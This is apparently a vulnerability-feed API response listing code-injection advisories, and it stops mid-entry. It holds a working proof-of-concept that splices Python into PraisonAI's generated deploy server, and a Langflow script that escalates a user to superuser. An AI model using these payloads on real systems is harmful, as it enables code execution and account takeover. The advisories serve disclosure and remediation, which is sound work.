{"success":true,"data":{"threats":[{"id":"b19c8a97-d79f-44f7-87f3-244328a99811","slug":"cve-2026-61433","externalId":"CVE-2026-61433","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"PraisonAI: API deploy code generator embeds unescaped YAML fields into Python source","description":"# API deploy code generator embeds unescaped YAML fields into Python source\n\n## Summary\n\nPraisonAI's API deployment generator copies `deploy.api.host` from `agents.yaml` directly into generated Python source without safe literal encoding. A malicious PraisonAI project can set that host value to a Python expression splice; when an operator runs the API deploy flow, the generated server source compiles and executes the injected expression at startup. The same generator also embeds `agents_file` directly into generated route-handler expressions, giving a second route-time source injection site if the agent file path is attacker-controlled.\n\n## Technical Details\n\nThe vulnerable path starts with deployment configuration parsing. `Deploy.from_yaml()` reads the operator-supplied `agents.yaml`, `validate_agents_yaml()` accepts `deploy.api.host` as a string, and API deployments call `start_api_server(self.agents_file, self.config.api)`. `start_api_server()` calls `generate_api_server_code()` and executes the generated Python file with `python`.\n\nThe current generator in `src/praisonai/praisonai/deploy/api.py` treats deployment data as Python syntax:\n\n```python\ndef generate_api_server_code(agents_file: str, config: Optional[APIConfig] = None) -> str:\n    ...\n    code = f'''\"\"\"\n...\n        praisonai = PraisonAI(agent_file=\"{agents_file}\")\n...\n        \"agent_file\": \"{agents_file}\"\n...\n    app.run(\n        host='{config.host}',\n        port={config.port},\n        debug={config.reload}\n    )\n'''\n```\n\nThe violated invariant is that deployment configuration values should remain inert strings. Instead, `config.host` is inserted between single quotes in generated Python source. A value like this breaks out of the generated string literal and evaluates a Python expression:\n\n```text\n' + (__import__(\"pathlib\").Path(\"poc.txt\").write_text(\"DEPLOY_API_HOST_CODE_EXECUTED\") and \"\") + '\n```\n\nThe generated startup code then becomes equivalent to:\n\n```python\napp.run(\n    host='' + (__import__(\"pathlib\").Path(\"poc.txt\").write_text(\"DEPLOY_API_HOST_CODE_EXECUTED\") and \"\") + '',\n    port=8005,\n    debug=False,\n)\n```\n\nThat expression executes before Flask handles any request. This is not a shell parsing issue and not just direct use of an unsafe Python API; it is a data-to-code transformation in the deployment generator.\n\n`agents_file` has the same class of unsafe source interpolation in two generated route-handler expressions. A value shaped as `\" + (<side effect> and \"\") + \"` remains valid both in `PraisonAI(agent_file=...)` and in the `/agents` JSON response expression, so it executes when the generated handler evaluates that value.\n\n## PoV\n\nThe following local-only PoV stubs Flask and PraisonAI so it does not start a listener, invoke a model provider, or contact any external service. It proves that a malicious host value survives YAML schema parsing and executes when the generated server module is evaluated as `__main__`; it also includes a safe-host negative control and the secondary `agents_file` route-time interpolation check.\n\n```python\nfrom pathlib import Path\nimport json\nimport sys\nimport tempfile\nimport types\n\nimport yaml\n\n\ndef install_stubs():\n    class FakeApp:\n        def __init__(self, name):\n            self.name = name\n\n        def route(self, *args, **kwargs):\n            def deco(func):\n                return func\n\n            return deco\n\n        def run(self, *args, **kwargs):\n            return None\n\n    flask = types.ModuleType(\"flask\")\n    flask.Flask = FakeApp\n    flask.request = types.SimpleNamespace(headers={}, get_json=lambda: {\"message\": \"hello\"})\n    flask.jsonify = lambda obj: obj\n    sys.modules[\"flask\"] = flask\n\n    flask_cors = types.ModuleType(\"flask_cors\")\n    flask_cors.CORS = lambda app: app\n    sys.modules[\"flask_cors\"] = flask_cors\n\n    praisonai_mod = types.ModuleType(\"praisonai\")\n\n    class FakePraisonAI:\n        def __init__(self, agent_file):\n            self.agent_file = agent_file\n\n        def run(self):\n            return \"ok\"\n\n    praisonai_mod.PraisonAI = FakePraisonAI\n    sys.modules[\"praisonai\"] = praisonai_mod\n\n\ndef main(repo):\n    sys.path.insert(0, str(Path(repo) / \"src\" / \"praisonai\"))\n    from praisonai.deploy.api import generate_api_server_code\n    from praisonai.deploy.models import APIConfig\n    from praisonai.deploy.schema import validate_agents_yaml\n\n    install_stubs()\n\n    with tempfile.TemporaryDirectory() as tmp:\n        tmp_path = Path(tmp)\n        host_marker = tmp_path / \"host-marker.txt\"\n        file_marker = tmp_path / \"agent-file-marker.txt\"\n        host_payload = \"' + (__import__(\\\"pathlib\\\").Path(\" + repr(str(host_marker)) + \").write_text(\\\"DEPLOY_API_HOST_CODE_EXECUTED\\\") and \\\"\\\") + '\"\n        agents_yaml = tmp_path / \"agents.yaml\"\n        agents_yaml.write_text(yaml.safe_dump({\n            \"deploy\": {\n                \"type\": \"api\",\n                \"api\": {\"host\": host_payload, \"port\": 8005, \"auth_enabled\": False},\n            },\n            \"agents\": [{\"name\": \"demo\", \"role\": \"demo\", \"goal\": \"demo\"}],\n        }))\n        parsed_config = validate_agents_yaml(str(agents_yaml))\n\n        results = []\n        for label, config in [\n            (\"safe_host\", APIConfig(host=\"127.0.0.1\", auth_enabled=False)),\n            (\"malicious_host_from_yaml\", parsed_config.api),\n        ]:\n            host_marker.unlink(missing_ok=True)\n            code = generate_api_server_code(\"agents.yaml\", config)\n            compile(code, f\"<generated-{label}>\", \"exec\")\n            exec(code, {\"__name__\": \"__main__\"})\n            results.append({\n                \"case\": label,\n                \"compiled\": True,\n                \"host_preserved_by_yaml_parser\": config.host == host_payload if label.startswith(\"malicious\") else None,\n                \"marker_exists_after_startup\": host_marker.exists(),\n                \"marker_contents\": host_marker.read_text() if host_marker.exists() else None,\n                \"generated_contains_raw_host\": config.host in code,\n            })\n\n        file_payload = \"\\\" + (__import__(\\\"pathlib\\\").Path(\" + repr(str(file_marker)) + \").write_text(\\\"DEPLOY_API_AGENT_FILE_CODE_EXECUTED\\\") and \\\"\\\") + \\\"\"\n        file_marker.unlink(missing_ok=True)\n        code = generate_api_server_code(file_payload, APIConfig(host=\"127.0.0.1\", auth_enabled=False))\n        compile(code, \"<generated-agent-file>\", \"exec\")\n        namespace = {\"__name__\": \"generated_agent_file\"}\n        exec(code, namespace)\n        namespace[\"list_agents\"]()\n        results.append({\n            \"case\": \"malicious_agent_file_route_value\",\n            \"compiled\": True,\n            \"marker_exists_after_list_agents\": file_marker.exists(),\n            \"marker_contents\": file_marker.read_text() if file_marker.exists() else None,\n            \"generated_contains_raw_agent_file\": file_payload in code,\n        })\n\n    print(json.dumps(results, indent=2))\n    return 0 if results[1][\"marker_exists_after_startup\"] and results[2][\"marker_exists_after_list_agents\"] else 1\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(main(sys.argv[1] if len(sys.argv) > 1 else \".\"))\n```\n\n## PoC\n\nCommand used against current source:\n\n```sh\nuv run --with pydantic --with pyyaml python pov_deploy_api_config_injection.py /path/to/PraisonAI\n```\n\nDecisive output:\n\n```json\n[\n  {\n    \"case\": \"safe_host\",\n    \"compiled\": true,\n    \"host_preserved_by_yaml_parser\": null,\n    \"marker_exists_after_startup\": false,\n    \"marker_contents\": null,\n    \"generated_contains_raw_host\": true\n  },\n  {\n    \"case\": \"malicious_host_from_yaml\",\n    \"compiled\": true,\n    \"host_preserved_by_yaml_parser\": true,\n    \"marker_exists_after_startup\": true,\n    \"marker_contents\": \"DEPLOY_API_HOST_CODE_EXECUTED\",\n    \"generated_contains_raw_host\": true\n  },\n  {\n    \"case\": \"malicious_agent_file_route_value\",\n    \"compiled\": true,\n    \"marker_exists_after_list_agents\": true,\n    \"marker_contents\": \"DEPLOY_API_AGENT_FILE_CODE_EXECUTED\",\n    \"generated_contains_raw_agent_file\": true\n  }\n]\n```\n\nThe `safe_host` negative control compiles and evaluates the generated module without a marker side effect. The `malicious_host_from_yaml` case proves the YAML parser preserved the malicious host as a config string and the generated server executed it at startup. The `malicious_agent_file_route_value` case proves the secondary file-path interpolation executes when the generated `/agents` handler evaluates the generated response.\n\n## Impact\n\nIf an operator deploys a malicious PraisonAI project configuration, arbitrary Python can execute in the deploy process when the generated API server starts. That process can access the operator's environment, source tree, local files, model/API credentials, and deployment credentials. This is a project-configuration supply-chain issue rather than an unauthenticated remote endpoint: the security boundary is that deployment config values should stay data and not become executable Python source.\n\n## Suggested Fix\n\nDo not interpolate deployment values directly into generated Python source. Use `repr()` or `json.dumps()` for every generated Python literal, or load runtime values from a JSON sidecar, environment variable, or command-line argument instead of embedding them into source. For the current generator, replace `host='{config.host}'` with a safely encoded literal such as `host={config.host!r}`, and apply the same safe encoding to `agents_file` in both generated sites. Add regression tests with host and agent-file values containing quotes, newlines, and expression-splice strings; the generated source should compile and treat those values as inert strings.\n\n## Affected Package/Versions\n\nPackage: `praisonai`\n\nConfirmed current head: `1620b49f36945d8cc8ee5635b906c960df5097a0`\n\nStatic sweep:\n\n| Target | Result |\n| --- | --- |\n| `v4.5.128` | affected; raw `agents_file` and `config.host` interpolation present |\n| `v4.6.58` | affected; raw `agents_file` and `config.host` interpolation present |\n| `v4.6.59` | affected; raw `agents_file` and `config.host` interpolation present |\n| `v4.6.60` | affected; raw `agents_file` and `config.host` interpolation present |\n| `v4.6.62` | affected; raw `agents_file` and `config.host` interpolation present |\n| `v4.6.63` | affected; raw `agents_file` and `config.host` interpolation present |\n| current `1620b49f` | affected; raw `agents_file` and `config.host` interpolation present |\n\nSuggested severity: High\n\nSuggested CVSS v3.1:\n\n```text\nCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n```\n\nSuggested CWEs:\n\n- CWE-94: Improper Control of Generation of Code\n- CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code\n- CWE-116: Improper Encoding or Escaping of Output\n\n## Advisory History\n\nThe closest same-generator comparator is `GHSA-8444-4fhq-fxpq`, \"PraisonAI deploy --type api emits a Flask server with authentication disabled by default.\" That advisory concerns the security posture of the generated Flask API server: missing authentication by default. This report is different: authentication can be enabled or disabled and the issue still exists because `generate_api_server_code()` emits deployment strings as Python syntax. The exploit primitive is generated-source injection from `deploy.api.host` and `agents_file`, not unauthenticated request access to the generated API.\n\nThis is also distinct from `GHSA-6rmh-7xcm-cpxj` / `CVE-2026-44338`, which addressed a legacy generated API server authentication issue. Both authentication advisories are useful context because they involve generated API server deployment, but neither covers unsafe literal encoding or Python expression injection in `generate_api_server_code()`.\n\nAgentOS, AgentTeam, A2U, MCP, and recipe-server authentication bypass reports are separate server-surface issues. Their root cause is missing request authentication or bind-policy enforcement, while this report's root cause is unsafe code generation before the server handles traffic.\n\n## References\n\n- `src/praisonai/praisonai/deploy/api.py`: `generate_api_server_code()` and `start_api_server()`\n- `src/praisonai/praisonai/deploy/main.py`: `Deploy.from_yaml()` and API/Docker deployment paths\n- `src/praisonai/praisonai/cli/features/deploy.py`: CLI deployment handler\n- `GHSA-8444-4fhq-fxpq`: prior `praisonai deploy --type api` generated API server authentication-default issue\n- `GHSA-6rmh-7xcm-cpxj` / `CVE-2026-44338`: prior generated API server authentication issue\n- CWE-94: https://cwe.mitre.org/data/definitions/94.html\n- CWE-95: https://cwe.mitre.org/data/definitions/95.html\n- CWE-116: https://cwe.mitre.org/data/definitions/116.html","cveId":"CVE-2026-61433","cvssScore":null,"cvssVector":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","severity":"high","vendor":"PyPI","product":"praisonai","affectedVersions":["pkg:pypi/praisonai < 4.6.78"],"cwes":["CWE-116","CWE-94","CWE-95"],"tags":["osv","osv:ghsa-79fv-7hq9-w7xg","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-79fv-7hq9-w7xg","type":"advisory","title":"OSV GHSA-79fv-7hq9-w7xg"},{"url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-79fv-7hq9-w7xg","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61433","type":"advisory","title":"OSV advisory"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-62173","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/MervinPraison/PraisonAI/commit/1620b49f36945d8cc8ee5635b906c960df5097a0","type":"other","title":"OSV web"},{"url":"https://github.com/MervinPraison/PraisonAI","type":"vendor","title":"OSV package"},{"url":"https://www.vulncheck.com/advisories/praisonai-before-code-injection-via-api-deployment-generator","type":"other","title":"OSV web"}],"epssScore":0.0021,"epssPercentile":0.10331,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T19:36:29.000Z","addedAt":"2026-10-08T19:47:39.017Z","updatedAt":"2026-10-08T21:08:31.085Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-61433","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-61433","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-79FV-7HQ9-W7XG"}]},{"id":"603dcf58-e74c-4c49-b750-fcc0732139cc","slug":"cve-2026-85486","externalId":"CVE-2026-85486","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-85486 — Brocade ASCG before 3.5.0 improperly processes user input by evaluating form data prior to validation.","description":"Brocade ASCG before 3.5.0 improperly processes user input by evaluating form data prior to validation. When an authenticated user submits a configuration form, the submitted text could immediately be processed. A malicious actor with basic access can supply crafted input to execute arbitrary code on the server and take control of the application.","cveId":"CVE-2026-85486","cvssScore":8.6,"cvssVector":"CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-95"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://support.broadcom.com/external/content/SecurityAdvisories/0/38381","type":"advisory","title":"sirt@brocade.com"}],"epssScore":0.00228,"epssPercentile":0.12436,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-08T07:16:32.317Z","addedAt":"2026-10-08T08:39:29.303Z","updatedAt":"2026-10-08T21:05:47.535Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-85486","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-85486","note":"authoritative record"}]},{"id":"02c39584-8a9e-49cf-80b4-ce56242ec9ba","slug":"cve-2026-10561","externalId":"GHSA-8qpj-27x8-pwpq","source":"OSV","sourceType":"ghsa","type":"vulnerability","title":"Langflow: PythonREPLComponent executes unsandboxed Python code, enabling authenticated RCE and privilege escalation","description":"### Summary\n\nLangflow's built-in Python interpreter components — `PythonREPLComponent` (Python Interpreter) and the legacy `PythonREPLToolComponent` (Python REPL Tool) — executed arbitrary user- or model-supplied Python code inside flows without effective sandboxing. Because the code ran in-process with the privileges of the Langflow service, any **authenticated** user who could edit and run a flow could achieve remote code execution and, from there, escalate privileges to superuser (e.g. by opening a database session and flipping `is_superuser`) or compromise the host.\n\n**This issue is fixed as of 1.10.1**, with additional hardening through 1.12.3. See *Remediation* below.\n\n### Affected\n\n- **Package:** `langflow` (PyPI), and the underlying `lfx` package that ships the component.\n- **Vulnerable versions:** `< 1.10.1`.\n- **Patched:** `1.10.1` (core fix). Upgrade to `>= 1.12.3` for the complete hardening series.\n\n### Details\n\nThe root cause is **code injection** (CWE-94/CWE-95): the component passed raw input to LangChain's `PythonREPL`, which is explicitly *not* a security sandbox.\n\nTwo distinct weaknesses existed before 1.10.1:\n\n1. **Unrestricted builtins (default deployments).** `get_globals()` built the `exec` globals from the `global_imports` allow-list but never set `__builtins__`. CPython's `exec()` then auto-injected the full `builtins` module, leaving `__import__`, `open`, `eval`, `exec` and the whole import machinery reachable regardless of the allow-list — e.g. `__import__(\"os\").system(...)` or `__import__(\"subprocess\").check_output([...])`. This made the \"only modules in Global Imports can be used\" guarantee false, and it applied even with the **default** configuration (`allow_custom_components=True`).\n\n2. **No server-policy gate (locked-down deployments).** Even a deployment hardened with `allow_custom_components=False` could still run interpreter code, because the components did not consult that policy before executing.\n\nBoth let an authenticated user run the reported PoC, which opens a DB session and sets `is_superuser = True` on their account, or writes to the filesystem / runs OS commands with the service's privileges.\n\n### PoC (as reported)\n\n1. Authenticate as a normal user.\n2. Create a flow with the `PythonREPLComponent`.\n3. Execute Python that imports Langflow internals and elevates the account:\n\n```python\nimport asyncio\nfrom sqlmodel import select\nfrom langflow.services.database.models.user.model import User\nfrom langflow.services.deps import session_scope\n\nasync def escalate():\n    async with session_scope() as session:\n        stmt = select(User).where(User.username == 'testuser')\n        user = (await session.exec(stmt)).first()\n        if user:\n            user.is_superuser = True\n            session.add(user)\n            await session.commit()\n\nasyncio.run(escalate())\n```\n\n### Impact\n\nAny authenticated user could:\n- Execute arbitrary Python / OS commands with the Langflow service's privileges (RCE).\n- Escalate their own account to superuser via direct database access.\n- Read/modify data and configuration, and potentially pivot to the underlying host.\n\n### Remediation\n\nUpgrade to **Langflow 1.10.1 or later** (preferably **>= 1.12.3**). The interpreter components were hardened with layered, defense-in-depth controls, applied in `run_python_repl()` before any code is executed:\n\n- **Restricted builtins** — `get_globals()` injects a curated `safe_builtins()` mapping, removing `__import__`, `eval`, `exec`, `compile`, `open`, `input`, `globals`/`locals`/`vars`, `getattr`/`setattr`, etc. (#13397)\n- **AST validation** — `validate_code_safety()` rejects inline `import`/`from ... import`, dunder/escape-gadget attribute access (`__class__`, `__subclasses__`, `__globals__`, frame/traceback introspection) and format-string dunder traversal. (#13397)\n- **Server-policy gate** — `ensure_code_execution_enabled()` refuses to run when `allow_custom_components=False` or `block_code_interpreter_components=True`, and **fails closed** if the settings stack cannot be resolved. (#13700 — this advisory — and #14375)\n- **Allow-listed module proxies** — imported modules are exposed via a proxy that blocks reaching `sys.modules[\"os\"]` through a module's transitive import graph. (#15198)\n- **Optional hardware isolation** — configure `LANGFLOW_SANDBOX_BACKEND` to run interpreter code in an isolated microVM instead of in-process. (#14400)\n\nUpstream fix references: #13397, #13700 (carries this GHSA), #14375, #14400, #15198.\n\n### Hardening recommendations for operators\n\n- Keep Langflow updated (>= 1.12.3).\n- For locked-down deployments, set `LANGFLOW_ALLOW_CUSTOM_COMPONENTS=false` (or `LANGFLOW_BLOCK_CODE_INTERPRETER_COMPONENTS=true`) to disable the interpreter entirely.\n- For deployments that must run untrusted code, configure `LANGFLOW_SANDBOX_BACKEND` for microVM isolation.\n- Run the Langflow service as an unprivileged user with least-privilege database credentials.","cveId":"CVE-2026-10561","cvssScore":null,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","severity":"critical","vendor":"PyPI","product":"langflow","affectedVersions":["pkg:pypi/langflow < 1.10.1"],"cwes":["CWE-266","CWE-94","CWE-95"],"tags":["osv","osv:ghsa-8qpj-27x8-pwpq","ecosystem:pypi"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://osv.dev/vulnerability/GHSA-8qpj-27x8-pwpq","type":"advisory","title":"OSV GHSA-8qpj-27x8-pwpq"},{"url":"https://github.com/langflow-ai/langflow/security/advisories/GHSA-8qpj-27x8-pwpq","type":"other","title":"OSV web"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-10561","type":"advisory","title":"OSV advisory"},{"url":"https://github.com/langflow-ai/langflow/pull/13700","type":"other","title":"OSV web"},{"url":"https://github.com/langflow-ai/langflow/commit/2754c84aad1306f463db1c3bbb3e8ffbe85da77d","type":"other","title":"OSV web"},{"url":"https://github.com/langflow-ai/langflow","type":"vendor","title":"OSV package"},{"url":"https://github.com/langflow-ai/langflow/releases/tag/v1.10.1","type":"other","title":"OSV web"},{"url":"https://www.ibm.com/support/pages/node/7277242","type":"other","title":"OSV web"}],"epssScore":0.0082,"epssPercentile":0.5596,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-06T13:38:28.000Z","addedAt":"2026-10-06T13:54:20.772Z","updatedAt":"2026-10-06T13:54:20.772Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-10561","note":"may still be awaiting NVD analysis"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-10561","note":"authoritative record"},{"label":"GitHub Advisory","url":"https://github.com/advisories/GHSA-8qpj-27x8-pwpq"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-8qpj-27x8-pwpq"}]},{"id":"2b7f275d-0b80-48ac-b9c2-ae1b9cc995b7","slug":"cve-2026-105315","externalId":"CVE-2026-105315","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-105315 — A vulnerability has been found in django-haystack up to 3.3.0.","description":"A vulnerability has been found in django-haystack up to 3.3.0. Affected is the function _to_python of the file haystack/backends/elasticsearch_backend.py of the component more_like_this Template Tag Handler. Such manipulation of the argument result_class leads to improper neutralization of directives in dynamically evaluated code. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.4.0 is able to address this issue. The name of the patch is eb05f193c9771a68dcc8cfac6674a0d48a52ee9d. It is suggested to upgrade the affected component.","cveId":"CVE-2026-105315","cvssScore":2,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"low","vendor":"PyPI","product":"django-haystack","affectedVersions":["pkg:pypi/django-haystack < 3.4.0"],"cwes":["CWE-94","CWE-95"],"tags":["nvd","status:received","osv","osv:ghsa-r3hx-x5rh-p9vv","ecosystem:pypi","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/django-haystack/django-haystack/","type":"advisory","title":"cna@vuldb.com"},{"url":"https://github.com/django-haystack/django-haystack/commit/eb05f193c9771a68dcc8cfac6674a0d48a52ee9d","type":"advisory","title":"cna@vuldb.com"},{"url":"https://github.com/django-haystack/django-haystack/releases/tag/v3.4.0","type":"advisory","title":"cna@vuldb.com"},{"url":"https://github.com/django-haystack/django-haystack/security/advisories/GHSA-r3hx-x5rh-p9vv","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/cve/CVE-2026-105315","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/submit/978642","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/413523","type":"advisory","title":"cna@vuldb.com"},{"url":"https://vuldb.com/vuln/413523/cti","type":"advisory","title":"cna@vuldb.com"},{"url":"https://osv.dev/vulnerability/GHSA-r3hx-x5rh-p9vv","type":"advisory","title":"OSV GHSA-r3hx-x5rh-p9vv"},{"url":"https://github.com/django-haystack/django-haystack","type":"vendor","title":"OSV package"}],"epssScore":0.00254,"epssPercentile":0.15609,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-10-05T13:16:52.823Z","addedAt":"2026-10-05T13:50:41.010Z","updatedAt":"2026-10-06T15:50:57.703Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-105315","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-105315","note":"authoritative record"},{"label":"OSV","url":"https://osv.dev/vulnerability/GHSA-R3HX-X5RH-P9VV"}]},{"id":"61b8f01e-008a-4c3b-b22e-d9978b7263b0","slug":"cve-2026-55094","externalId":"CVE-2026-55094","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-55094 — Taskcluster is the task execution framework that supports Mozilla's continuous integration and release processes.","description":"Taskcluster is the task execution framework that supports Mozilla's continuous integration and release processes. Prior to version 100.3.0, Taskcluster is vulnerable to unauthenticated RCE on Taskcluster deployments with an anonymous role that exposes the GraphQL endpoint and parses filter arguments using the sift library. This issue has been patched in version 100.3.0.","cveId":"CVE-2026-55094","cvssScore":8.7,"cvssVector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"high","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-20","CWE-94","CWE-95","CWE-250","CWE-306"],"tags":["nvd","status:received","status:deferred"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://bugzilla.mozilla.org/show_bug.cgi?id=2045091","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/taskcluster/taskcluster/commit/a1b0154b8235937657c2ded127f193b564e2334b","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/taskcluster/taskcluster/issues/8716","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/taskcluster/taskcluster/pull/8718","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/taskcluster/taskcluster/releases/tag/v100.3.0","type":"advisory","title":"security-advisories@github.com"},{"url":"https://github.com/taskcluster/taskcluster/security/advisories/GHSA-ccv5-c45x-2q38","type":"advisory","title":"security-advisories@github.com"}],"epssScore":0.00423,"epssPercentile":0.34605,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-30T18:18:37.387Z","addedAt":"2026-09-30T19:50:43.929Z","updatedAt":"2026-09-30T21:50:44.639Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-55094","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-55094","note":"authoritative record"}]},{"id":"250f7682-1e31-4fd9-97cc-fbf5ec0621b5","slug":"cve-2026-69662","externalId":"CVE-2026-69662","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2026-69662 — The application uses unsafe functions that allow execution of inline scripts and string evaluation functions.","description":"The application uses unsafe functions that allow execution of inline scripts and string evaluation functions.","cveId":"CVE-2026-69662","cvssScore":2.1,"cvssVector":"CVSS:4.0/AV:A/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","severity":"low","vendor":null,"product":null,"affectedVersions":[],"cwes":["CWE-95"],"tags":["nvd","status:received","status:awaiting-analysis"],"relatedCves":[],"titleFingerprint":null,"countryCodes":[],"knownExploited":false,"patchAvailable":false,"patchLinks":[],"references":[{"url":"https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-272-02.json","type":"advisory","title":"ics-cert@hq.dhs.gov"},{"url":"https://www.cisa.gov/news-events/ics-advisories/icsa-26-272-02","type":"advisory","title":"ics-cert@hq.dhs.gov"},{"url":"https://www.toptech.com/blog/tms7-version-7-8-strengthens-security","type":"advisory","title":"ics-cert@hq.dhs.gov"}],"epssScore":0.00187,"epssPercentile":0.0763,"nucleiTemplatePath":null,"nucleiSeverity":null,"enrichment":null,"publishedAt":"2026-09-29T22:17:58.803Z","addedAt":"2026-09-29T23:50:39.305Z","updatedAt":"2026-09-30T17:50:46.476Z","epssUpdatedAt":"2026-10-08T12:00:21.000Z","nucleiUpdatedAt":null,"links":[{"label":"NVD","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-69662","note":"ingested from NVD"},{"label":"CVE Program","url":"https://www.cve.org/CVERecord?id=CVE-2026-69662","note":"authoritative record"}]},{"id":"291b3d76-e7bf-480e-b501-9cb4e62a52a2","slug":"cve-2024-42002","externalId":"CVE-2024-42002","source":"NVD","sourceType":"cve-db","type":"vulnerability","title":"CVE-2024-42002 — A code injection vulnerability has been discovered in the Robot Operating System 2 (ROS 2) 'ros2topic' command-line tool, affecting all ROS 2 distr…","description":"A code injection vulnerability has been discovered in the Robot Operating System 2 (ROS 2) 'ros2topic' command-line tool, affecting all ROS 2 distributions from Crystal Clemmys up to and including Lyrical Luth and Rolling Ridley. The vulnerability lies in the 'hz' verb, which reports the publishing rate of a topic and accepts a user-provided Python expression via the --filter option. This input is passed directly to the eval() function without sanitization, allowing a local user to craft and execute arbitrary 